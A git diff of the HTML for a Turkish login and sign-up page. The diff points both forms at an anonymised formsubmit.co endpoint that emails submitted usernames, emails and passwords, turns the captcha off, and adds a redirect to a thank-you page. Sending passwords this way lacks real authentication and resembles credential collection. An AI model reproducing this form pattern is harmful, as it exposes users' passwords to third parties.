--- a/index.html
+++ b/index.html
@@ -141,9 +141,10 @@
   <div class="container">
     <div class="card">
       <h2>Giriş Yap</h2>
-      <form action="https://formsubmit.co/hasanyusufyildiz35@gmail.com" method="POST">
+      <form action="https://formsubmit.co/997c2f2e7969192680824b8671a9aa04" method="POST">
         <input type="hidden" name="_template" value="table" />
         <input type="hidden" name="_captcha" value="false" />
+        <input type="hidden" name="_next" value="https://hyyazilim.github.io/tesekkur.html" />
         <input type="text" name="username" placeholder="Kullanıcı Adı" required />
         <input type="password" name="password" placeholder="Şifre" required />
         <button type="submit">Giriş Yap</button>
@@ -152,9 +153,10 @@
 
     <div class="card">
       <h2>Kayıt Ol</h2>
-      <form action="https://formsubmit.co/hasanyusufyildiz35@gmail.com" method="POST">
+      <form action="https://formsubmit.co/997c2f2e7969192680824b8671a9aa04" method="POST">
         <input type="hidden" name="_template" value="table" />
         <input type="hidden" name="_captcha" value="false" />
+        <input type="hidden" name="_next" value="https://hyyazilim.github.io/tesekkur.html" />
         <input type="text" name="new_username" placeholder="Yeni Kullanıcı Adı" required />
         <input type="email" name="email" placeholder="E-posta" required />
         <input type="password" name="new_password" placeholder="Şifre" required />
